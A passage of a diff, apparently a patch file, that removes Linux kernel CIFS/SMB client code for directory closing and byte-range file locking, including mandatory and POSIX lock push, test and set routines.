+-	list_for_each_entry_safe(open_file, tmp, &tmp_list, rlist) {
+-		if (cifs_reopen_file(open_file, false /* do not flush */))
+-			tcon->need_reopen_files = true;
+-		list_del_init(&open_file->rlist);
+-		cifsFileInfo_put(open_file);
+-	}
+-}
+-
+-int cifs_closedir(struct inode *inode, struct file *file)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	char *buf;
+-
+-	cifs_dbg(FYI, "Closedir inode = 0x%p\n", inode);
+-
+-	if (cfile == NULL)
+-		return rc;
+-
+-	xid = get_xid();
+-	tcon = tlink_tcon(cfile->tlink);
+-	server = tcon->ses->server;
+-
+-	cifs_dbg(FYI, "Freeing private data in close dir\n");
+-	spin_lock(&cfile->file_info_lock);
+-	if (server->ops->dir_needs_close(cfile)) {
+-		cfile->invalidHandle = true;
+-		spin_unlock(&cfile->file_info_lock);
+-		if (server->ops->close_dir)
+-			rc = server->ops->close_dir(xid, tcon, &cfile->fid);
+-		else
+-			rc = -ENOSYS;
+-		cifs_dbg(FYI, "Closing uncompleted readdir with rc %d\n", rc);
+-		/* not much we can do if it fails anyway, ignore rc */
+-		rc = 0;
+-	} else
+-		spin_unlock(&cfile->file_info_lock);
+-
+-	buf = cfile->srch_inf.ntwrk_buf_start;
+-	if (buf) {
+-		cifs_dbg(FYI, "closedir free smb buf in srch struct\n");
+-		cfile->srch_inf.ntwrk_buf_start = NULL;
+-		if (cfile->srch_inf.smallBuf)
+-			cifs_small_buf_release(buf);
+-		else
+-			cifs_buf_release(buf);
+-	}
+-
+-	cifs_put_tlink(cfile->tlink);
+-	kfree(file->private_data);
+-	file->private_data = NULL;
+-	/* BB can we lock the filestruct while this is going on? */
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static struct cifsLockInfo *
+-cifs_lock_init(__u64 offset, __u64 length, __u8 type, __u16 flags)
+-{
+-	struct cifsLockInfo *lock =
+-		kmalloc(sizeof(struct cifsLockInfo), GFP_KERNEL);
+-	if (!lock)
+-		return lock;
+-	lock->offset = offset;
+-	lock->length = length;
+-	lock->type = type;
+-	lock->pid = current->tgid;
+-	lock->flags = flags;
+-	INIT_LIST_HEAD(&lock->blist);
+-	init_waitqueue_head(&lock->block_q);
+-	return lock;
+-}
+-
+-void
+-cifs_del_lock_waiters(struct cifsLockInfo *lock)
+-{
+-	struct cifsLockInfo *li, *tmp;
+-	list_for_each_entry_safe(li, tmp, &lock->blist, blist) {
+-		list_del_init(&li->blist);
+-		wake_up(&li->block_q);
+-	}
+-}
+-
+-#define CIFS_LOCK_OP	0
+-#define CIFS_READ_OP	1
+-#define CIFS_WRITE_OP	2
+-
+-/* @rw_check : 0 - no op, 1 - read, 2 - write */
+-static bool
+-cifs_find_fid_lock_conflict(struct cifs_fid_locks *fdlocks, __u64 offset,
+-			    __u64 length, __u8 type, __u16 flags,
+-			    struct cifsFileInfo *cfile,
+-			    struct cifsLockInfo **conf_lock, int rw_check)
+-{
+-	struct cifsLockInfo *li;
+-	struct cifsFileInfo *cur_cfile = fdlocks->cfile;
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-
+-	list_for_each_entry(li, &fdlocks->locks, llist) {
+-		if (offset + length <= li->offset ||
+-		    offset >= li->offset + li->length)
+-			continue;
+-		if (rw_check != CIFS_LOCK_OP && current->tgid == li->pid &&
+-		    server->ops->compare_fids(cfile, cur_cfile)) {
+-			/* shared lock prevents write op through the same fid */
+-			if (!(li->type & server->vals->shared_lock_type) ||
+-			    rw_check != CIFS_WRITE_OP)
+-				continue;
+-		}
+-		if ((type & server->vals->shared_lock_type) &&
+-		    ((server->ops->compare_fids(cfile, cur_cfile) &&
+-		     current->tgid == li->pid) || type == li->type))
+-			continue;
+-		if (rw_check == CIFS_LOCK_OP &&
+-		    (flags & FL_OFDLCK) && (li->flags & FL_OFDLCK) &&
+-		    server->ops->compare_fids(cfile, cur_cfile))
+-			continue;
+-		if (conf_lock)
+-			*conf_lock = li;
+-		return true;
+-	}
+-	return false;
+-}
+-
+-bool
+-cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
+-			__u8 type, __u16 flags,
+-			struct cifsLockInfo **conf_lock, int rw_check)
+-{
+-	bool rc = false;
+-	struct cifs_fid_locks *cur;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-
+-	list_for_each_entry(cur, &cinode->llist, llist) {
+-		rc = cifs_find_fid_lock_conflict(cur, offset, length, type,
+-						 flags, cfile, conf_lock,
+-						 rw_check);
+-		if (rc)
+-			break;
+-	}
+-
+-	return rc;
+-}
+-
+-/*
+- * Check if there is another lock that prevents us to set the lock (mandatory
+- * style). If such a lock exists, update the flock structure with its
+- * properties. Otherwise, set the flock type to F_UNLCK if we can cache brlocks
+- * or leave it the same if we can't. Returns 0 if we don't need to request to
+- * the server or 1 otherwise.
+- */
+-static int
+-cifs_lock_test(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
+-	       __u8 type, struct file_lock *flock)
+-{
+-	int rc = 0;
+-	struct cifsLockInfo *conf_lock;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-	bool exist;
+-
+-	down_read(&cinode->lock_sem);
+-
+-	exist = cifs_find_lock_conflict(cfile, offset, length, type,
+-					flock->fl_flags, &conf_lock,
+-					CIFS_LOCK_OP);
+-	if (exist) {
+-		flock->fl_start = conf_lock->offset;
+-		flock->fl_end = conf_lock->offset + conf_lock->length - 1;
+-		flock->fl_pid = conf_lock->pid;
+-		if (conf_lock->type & server->vals->shared_lock_type)
+-			flock->fl_type = F_RDLCK;
+-		else
+-			flock->fl_type = F_WRLCK;
+-	} else if (!cinode->can_cache_brlcks)
+-		rc = 1;
+-	else
+-		flock->fl_type = F_UNLCK;
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static void
+-cifs_lock_add(struct cifsFileInfo *cfile, struct cifsLockInfo *lock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	cifs_down_write(&cinode->lock_sem);
+-	list_add_tail(&lock->llist, &cfile->llist->locks);
+-	up_write(&cinode->lock_sem);
+-}
+-
+-/*
+- * Set the byte-range lock (mandatory style). Returns:
+- * 1) 0, if we set the lock and don't need to request to the server;
+- * 2) 1, if no locks prevent us but we need to request to the server;
+- * 3) -EACCES, if there is a lock that prevents us and wait is false.
+- */
+-static int
+-cifs_lock_add_if(struct cifsFileInfo *cfile, struct cifsLockInfo *lock,
+-		 bool wait)
+-{
+-	struct cifsLockInfo *conf_lock;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	bool exist;
+-	int rc = 0;
+-
+-try_again:
+-	exist = false;
+-	cifs_down_write(&cinode->lock_sem);
+-
+-	exist = cifs_find_lock_conflict(cfile, lock->offset, lock->length,
+-					lock->type, lock->flags, &conf_lock,
+-					CIFS_LOCK_OP);
+-	if (!exist && cinode->can_cache_brlcks) {
+-		list_add_tail(&lock->llist, &cfile->llist->locks);
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-	if (!exist)
+-		rc = 1;
+-	else if (!wait)
+-		rc = -EACCES;
+-	else {
+-		list_add_tail(&lock->blist, &conf_lock->blist);
+-		up_write(&cinode->lock_sem);
+-		rc = wait_event_interruptible(lock->block_q,
+-					(lock->blist.prev == &lock->blist) &&
+-					(lock->blist.next == &lock->blist));
+-		if (!rc)
+-			goto try_again;
+-		cifs_down_write(&cinode->lock_sem);
+-		list_del_init(&lock->blist);
+-	}
+-
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * Check if there is another lock that prevents us to set the lock (posix
+- * style). If such a lock exists, update the flock structure with its
+- * properties. Otherwise, set the flock type to F_UNLCK if we can cache brlocks
+- * or leave it the same if we can't. Returns 0 if we don't need to request to
+- * the server or 1 otherwise.
+- */
+-static int
+-cifs_posix_lock_test(struct file *file, struct file_lock *flock)
+-{
+-	int rc = 0;
+-	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
+-	unsigned char saved_type = flock->fl_type;
+-
+-	if ((flock->fl_flags & FL_POSIX) == 0)
+-		return 1;
+-
+-	down_read(&cinode->lock_sem);
+-	posix_test_lock(file, flock);
+-
+-	if (flock->fl_type == F_UNLCK && !cinode->can_cache_brlcks) {
+-		flock->fl_type = saved_type;
+-		rc = 1;
+-	}
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-/*
+- * Set the byte-range lock (posix style). Returns:
+- * 1) <0, if the error occurs while setting the lock;
+- * 2) 0, if we set the lock and don't need to request to the server;
+- * 3) FILE_LOCK_DEFERRED, if we will wait for some other file_lock;
+- * 4) FILE_LOCK_DEFERRED + 1, if we need to request to the server.
+- */
+-static int
+-cifs_posix_lock_set(struct file *file, struct file_lock *flock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
+-	int rc = FILE_LOCK_DEFERRED + 1;
+-
+-	if ((flock->fl_flags & FL_POSIX) == 0)
+-		return rc;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	if (!cinode->can_cache_brlcks) {
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-	rc = posix_lock_file(file, flock, NULL);
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-int
+-cifs_push_mandatory_locks(struct cifsFileInfo *cfile)
+-{
+-	unsigned int xid;
+-	int rc = 0, stored_rc;
+-	struct cifsLockInfo *li, *tmp;
+-	struct cifs_tcon *tcon;
+-	unsigned int num, max_num, max_buf;
+-	LOCKING_ANDX_RANGE *buf, *cur;
+-	static const int types[] = {
+-		LOCKING_ANDX_LARGE_FILES,
+-		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
+-	};
+-	int i;
+-
+-	xid = get_xid();
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it before using.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE))) {
+-		free_xid(xid);
+-		return -EINVAL;
+-	}
+-
+-	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
+-		     PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
+-			PAGE_SIZE);
+-	max_num = (max_buf - sizeof(struct smb_hdr)) /
+-						sizeof(LOCKING_ANDX_RANGE);
+-	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
+-	if (!buf) {
+-		free_xid(xid);
+-		return -ENOMEM;
+-	}
+-
+-	for (i = 0; i < 2; i++) {
+-		cur = buf;
+-		num = 0;
+-		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-			if (li->type != types[i])
+-				continue;
+-			cur->Pid = cpu_to_le16(li->pid);
+-			cur->LengthLow = cpu_to_le32((u32)li->length);
+-			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
+-			cur->OffsetLow = cpu_to_le32((u32)li->offset);
+-			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
+-			if (++num == max_num) {
+-				stored_rc = cifs_lockv(xid, tcon,
+-						       cfile->fid.netfid,
+-						       (__u8)li->type, 0, num,
+-						       buf);
+-				if (stored_rc)
+-					rc = stored_rc;
+-				cur = buf;
+-				num = 0;
+-			} else
+-				cur++;
+-		}
+-
+-		if (num) {
+-			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
+-					       (__u8)types[i], 0, num, buf);
+-			if (stored_rc)
+-				rc = stored_rc;
+-		}
+-	}
+-
+-	kfree(buf);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static __u32
+-hash_lockowner(fl_owner_t owner)
+-{
+-	return cifs_lock_secret ^ hash32_ptr((const void *)owner);
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-struct lock_to_push {
+-	struct list_head llist;
+-	__u64 offset;
+-	__u64 length;
+-	__u32 pid;
+-	__u16 netfid;
+-	__u8 type;
+-};
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_push_posix_locks(struct cifsFileInfo *cfile)
+-{
+-	struct inode *inode = d_inode(cfile->dentry);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct file_lock *flock;
+-	struct file_lock_context *flctx = inode->i_flctx;
+-	unsigned int count = 0, i;
+-	int rc = 0, xid, type;
+-	struct list_head locks_to_send, *el;
+-	struct lock_to_push *lck, *tmp;
+-	__u64 length;
+-
+-	xid = get_xid();
+-
+-	if (!flctx)
+-		goto out;
+-
+-	spin_lock(&flctx->flc_lock);
+-	list_for_each(el, &flctx->flc_posix) {
+-		count++;
+-	}
+-	spin_unlock(&flctx->flc_lock);
+-
+-	INIT_LIST_HEAD(&locks_to_send);
+-
+-	/*
+-	 * Allocating count locks is enough because no FL_POSIX locks can be
+-	 * added to the list while we are holding cinode->lock_sem that
+-	 * protects locking operations of this inode.
+-	 */
+-	for (i = 0; i < count; i++) {
+-		lck = kmalloc(sizeof(struct lock_to_push), GFP_KERNEL);
+-		if (!lck) {
+-			rc = -ENOMEM;
+-			goto err_out;
+-		}
+-		list_add_tail(&lck->llist, &locks_to_send);
+-	}
+-
+-	el = locks_to_send.next;
+-	spin_lock(&flctx->flc_lock);
+-	list_for_each_entry(flock, &flctx->flc_posix, fl_list) {
+-		if (el == &locks_to_send) {
+-			/*
+-			 * The list ended. We don't have enough allocated
+-			 * structures - something is really wrong.
+-			 */
+-			cifs_dbg(VFS, "Can't push all brlocks!\n");
+-			break;
+-		}
+-		length = cifs_flock_len(flock);
+-		if (flock->fl_type == F_RDLCK || flock->fl_type == F_SHLCK)
+-			type = CIFS_RDLCK;
+-		else
+-			type = CIFS_WRLCK;
+-		lck = list_entry(el, struct lock_to_push, llist);
+-		lck->pid = hash_lockowner(flock->fl_owner);
+-		lck->netfid = cfile->fid.netfid;
+-		lck->length = length;
+-		lck->type = type;
+-		lck->offset = flock->fl_start;
+-	}
+-	spin_unlock(&flctx->flc_lock);
+-
+-	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
+-		int stored_rc;
+-
+-		stored_rc = CIFSSMBPosixLock(xid, tcon, lck->netfid, lck->pid,
+-					     lck->offset, lck->length, NULL,
+-					     lck->type, 0);
+-		if (stored_rc)
+-			rc = stored_rc;
+-		list_del(&lck->llist);
+-		kfree(lck);
+-	}
+-
+-out:
+-	free_xid(xid);
+-	return rc;
+-err_out:
+-	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
+-		list_del(&lck->llist);
+-		kfree(lck);
+-	}
+-	goto out;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_push_locks(struct cifsFileInfo *cfile)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	/* we are going to update can_cache_brlcks here - need a write access */
+-	cifs_down_write(&cinode->lock_sem);
+-	if (!cinode->can_cache_brlcks) {
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		rc = cifs_push_posix_locks(cfile);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = tcon->ses->server->ops->push_mand_locks(cfile);
+-
+-	cinode->can_cache_brlcks = false;
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static void
+-cifs_read_flock(struct file_lock *flock, __u32 *type, int *lock, int *unlock,
+-		bool *wait_flag, struct TCP_Server_Info *server)
+-{
+-	if (flock->fl_flags & FL_POSIX)
+-		cifs_dbg(FYI, "Posix\n");
+-	if (flock->fl_flags & FL_FLOCK)
+-		cifs_dbg(FYI, "Flock\n");
+-	if (flock->fl_flags & FL_SLEEP) {
+-		cifs_dbg(FYI, "Blocking lock\n");
+-		*wait_flag = true;
+-	}
+-	if (flock->fl_flags & FL_ACCESS)
+-		cifs_dbg(FYI, "Process suspended by mandatory locking - not implemented yet\n");
+-	if (flock->fl_flags & FL_LEASE)
+-		cifs_dbg(FYI, "Lease on file - not implemented yet\n");
+-	if (flock->fl_flags &
+-	    (~(FL_POSIX | FL_FLOCK | FL_SLEEP |
+-	       FL_ACCESS | FL_LEASE | FL_CLOSE | FL_OFDLCK)))
+-		cifs_dbg(FYI, "Unknown lock flags 0x%x\n", flock->fl_flags);
+-
+-	*type = server->vals->large_lock_type;
+-	if (flock->fl_type == F_WRLCK) {
+-		cifs_dbg(FYI, "F_WRLCK\n");
+-		*type |= server->vals->exclusive_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_UNLCK) {
+-		cifs_dbg(FYI, "F_UNLCK\n");
+-		*type |= server->vals->unlock_lock_type;
+-		*unlock = 1;
+-		/* Check if unlock includes more than one lock range */
+-	} else if (flock->fl_type == F_RDLCK) {
+-		cifs_dbg(FYI, "F_RDLCK\n");
+-		*type |= server->vals->shared_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_EXLCK) {
+-		cifs_dbg(FYI, "F_EXLCK\n");
+-		*type |= server->vals->exclusive_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_SHLCK) {
+-		cifs_dbg(FYI, "F_SHLCK\n");
+-		*type |= server->vals->shared_lock_type;
+-		*lock = 1;
+-	} else
+-		cifs_dbg(FYI, "Unknown type of lock\n");
+-}
+-
+-static int
+-cifs_getlk(struct file *file, struct file_lock *flock, __u32 type,
+-	   bool wait_flag, bool posix_lck, unsigned int xid)
+-{
+-	int rc = 0;
+-	__u64 length = cifs_flock_len(flock);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	__u16 netfid = cfile->fid.netfid;
+-
+-	if (posix_lck) {
+-		int posix_lock_type;
+-
+-		rc = cifs_posix_lock_test(file, flock);
+-		if (!rc)
+-			return rc;
+-
+-		if (type & server->vals->shared_lock_type)
+-			posix_lock_type = CIFS_RDLCK;
+-		else
+-			posix_lock_type = CIFS_WRLCK;
+-		rc = CIFSSMBPosixLock(xid, tcon, netfid,
+-				      hash_lockowner(flock->fl_owner),
+-				      flock->fl_start, length, flock,
+-				      posix_lock_type, wait_flag);
+-		return rc;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	rc = cifs_lock_test(cfile, flock->fl_start, length, type, flock);
+-	if (!rc)
+-		return rc;
+-
+-	/* BB we could chain these into one lock request BB */
+-	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length, type,
+-				    1, 0, false);
+-	if (rc == 0) {
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-					    type, 0, 1, false);
+-		flock->fl_type = F_UNLCK;
+-		if (rc != 0)
+-			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
+-				 rc);
+-		return 0;
+-	}
+-
+-	if (type & server->vals->shared_lock_type) {
+-		flock->fl_type = F_WRLCK;
+-		return 0;
+-	}
+-
+-	type &= ~server->vals->exclusive_lock_type;
+-
+-	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-				    type | server->vals->shared_lock_type,
+-				    1, 0, false);
+-	if (rc == 0) {
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-			type | server->vals->shared_lock_type, 0, 1, false);
+-		flock->fl_type = F_RDLCK;
+-		if (rc != 0)
+-			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
+-				 rc);
+-	} else
+-		flock->fl_type = F_WRLCK;
+-
+-	return 0;
+-}
+-
+-void
+-cifs_move_llist(struct list_head *source, struct list_head *dest)
+-{
+-	struct list_head *li, *tmp;
+-	list_for_each_safe(li, tmp, source)
+-		list_move(li, dest);
+-}
+-
+-void
+-cifs_free_llist(struct list_head *llist)
+-{
+-	struct cifsLockInfo *li, *tmp;
+-	list_for_each_entry_safe(li, tmp, llist, llist) {
+-		cifs_del_lock_waiters(li);
+-		list_del(&li->llist);
+-		kfree(li);
+-	}
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-int
+-cifs_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
+-		  unsigned int xid)
+-{
+-	int rc = 0, stored_rc;
+-	static const int types[] = {
+-		LOCKING_ANDX_LARGE_FILES,
+-		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
+-	};
+-	unsigned int i;
+-	unsigned int max_num, num, max_buf;
+-	LOCKING_ANDX_RANGE *buf, *cur;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifsLockInfo *li, *tmp;
+-	__u64 length = cifs_flock_len(flock);
+-	struct list_head tmp_llist;
+-
+-	INIT_LIST_HEAD(&tmp_llist);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it before using.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE)))
+-		return -EINVAL;
+-
+-	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
+-		     PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
+-			PAGE_SIZE);
+-	max_num = (max_buf - sizeof(struct smb_hdr)) /
+-						sizeof(LOCKING_ANDX_RANGE);
+-	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	for (i = 0; i < 2; i++) {
+-		cur = buf;
+-		num = 0;
+-		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-			if (flock->fl_start > li->offset ||
+-			    (flock->fl_start + length) <
+-			    (li->offset + li->length))
+-				continue;
+-			if (current->tgid != li->pid)
+-				continue;
+-			if (types[i] != li->type)
+-				continue;
+-			if (cinode->can_cache_brlcks) {
+-				/*
+-				 * We can cache brlock requests - simply remove
+-				 * a lock from the file's list.
+-				 */
+-				list_del(&li->llist);
+-				cifs_del_lock_waiters(li);
+-				kfree(li);
+-				continue;
+-			}
+-			cur->Pid = cpu_to_le16(li->pid);
+-			cur->LengthLow = cpu_to_le32((u32)li->length);
+-			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
+-			cur->OffsetLow = cpu_to_le32((u32)li->offset);
+-			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
+-			/*
+-			 * We need to save a lock here to let us add it again to
+-			 * the file's list if the unlock range request fails on
+-			 * the server.
+-			 */
+-			list_move(&li->llist, &tmp_llist);
+-			if (++num == max_num) {
+-				stored_rc = cifs_lockv(xid, tcon,
+-						       cfile->fid.netfid,
+-						       li->type, num, 0, buf);
+-				if (stored_rc) {
+-					/*
+-					 * We failed on the unlock range
+-					 * request - add all locks from the tmp
+-					 * list to the head of the file's list.
+-					 */
+-					cifs_move_llist(&tmp_llist,
+-							&cfile->llist->locks);
+-					rc = stored_rc;
+-				} else
+-					/*
+-					 * The unlock range request succeed -
+-					 * free the tmp list.
+-					 */
+-					cifs_free_llist(&tmp_llist);
+-				cur = buf;
+-				num = 0;
+-			} else
+-				cur++;
+-		}
+-		if (num) {
+-			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
+-					       types[i], num, 0, buf);
+-			if (stored_rc) {
+-				cifs_move_llist(&tmp_llist,
+-						&cfile->llist->locks);
+-				rc = stored_rc;
+-			} else
+-				cifs_free_llist(&tmp_llist);
+-		}
+-	}
+-
+-	up_write(&cinode->lock_sem);
+-	kfree(buf);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_setlk(struct file *file, struct file_lock *flock, __u32 type,
+-	   bool wait_flag, bool posix_lck, int lock, int unlock,
+-	   unsigned int xid)
+-{
+-	int rc = 0;
+-	__u64 length = cifs_flock_len(flock);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct inode *inode = d_inode(cfile->dentry);
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (posix_lck) {
+-		int posix_lock_type;
+-
+-		rc = cifs_posix_lock_set(file, flock);
+-		if (rc <= FILE_LOCK_DEFERRED)
+-			return rc;
+-
+-		if (type & server->vals->shared_lock_type)
+-			posix_lock_type = CIFS_RDLCK;
+-		else
+-			posix_lock_type = CIFS_WRLCK;
+-
+-		if (unlock == 1)
+-			posix_lock_type = CIFS_UNLCK;
+-
+-		rc = CIFSSMBPosixLock(xid, tcon, cfile->fid.netfid,
+-				      hash_lockowner(flock->fl_owner),
+-				      flock->fl_start, length,
+-				      NULL, posix_lock_type, wait_flag);
+-		goto out;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	if (lock) {
+-		struct cifsLockInfo *lock;
+-
+-		lock = cifs_lock_init(flock->fl_start, length, type,
+-				      flock->fl_flags);
+-		if (!lock)
+-			return -ENOMEM;
+-
+-		rc = cifs_lock_add_if(cfile, lock, wait_flag);
+-		if (rc < 0) {
+-			kfree(lock);
+-			return rc;
+-		}
+-		if (!rc)
+-			goto out;
+-
+-		/*
+-		 * Windows 7 server can delay breaking lease from read to None
+-		 * if we set a byte-range lock on a file - break it explicitly
+-		 * before sending the lock to the server to be sure the next
+-		 * read won't conflict with non-overlapted locks due to
+-		 * pagereading.
+-		 */
+-		if (!CIFS_CACHE_WRITE(CIFS_I(inode)) &&
+-					CIFS_CACHE_READ(CIFS_I(inode))) {
+-			cifs_zap_mapping(inode);
+-			cifs_dbg(FYI, "Set no oplock for inode=%p due to mand locks\n",
+-				 inode);
+-			CIFS_I(inode)->oplock = 0;
+-		}
+-
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-					    type, 1, 0, wait_flag);
+-		if (rc) {
+-			kfree(lock);
+-			return rc;
+-		}
+-
+-		cifs_lock_add(cfile, lock);
+-	} else if (unlock)
+-		rc = server->ops->mand_unlock_range(cfile, flock, xid);
+-
+-out:
+-	if ((flock->fl_flags & FL_POSIX) || (flock->fl_flags & FL_FLOCK)) {
+-		/*
+-		 * If this is a request to remove all locks because we
+-		 * are closing the file, it doesn't matter if the
+-		 * unlocking failed as both cifs.ko and the SMB server
+-		 * remove the lock on file close
+-		 */
+-		if (rc) {
+-			cifs_dbg(VFS, "%s failed rc=%d\n", __func__, rc);
+-			if (!(flock->fl_flags & FL_CLOSE))
+-				return rc;
+-		}
+-		rc = locks_lock_file_wait(file, flock);
+-	}
+-	return rc;
+-}
+-
+-int cifs_flock(struct file *file, int cmd, struct file_lock *fl)
+-{
+-	int rc, xid;
+-	int lock = 0, unlock = 0;
+-	bool wait_flag = false;
+-	bool posix_lck = false;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	__u32 type;
+-
+-	xid = get_xid();
+-
+-	if (!(fl->fl_flags & FL_FLOCK)) {
+-		rc = -ENOLCK;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	cfile = (struct cifsFileInfo *)file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	cifs_read_flock(fl, &type, &lock, &unlock, &wait_flag,
+-			tcon->ses->server);
+-	cifs_sb = CIFS_FILE_SB(file);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		posix_lck = true;
+-
+-	if (!lock && !unlock) {
+-		/*
+-		 * if no lock or unlock then nothing to do since we do not
+-		 * know what it is
+-		 */
+-		rc = -EOPNOTSUPP;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	rc = cifs_setlk(file, fl, type, wait_flag, posix_lck, lock, unlock,
+-			xid);
+-	free_xid(xid);
+-	return rc;
+-
+-
+-}
+-
+-int cifs_lock(struct file *file, int cmd, struct file_lock *flock)
+-{
+-	int rc, xid;
+-	int lock = 0, unlock = 0;
+-	bool wait_flag = false;
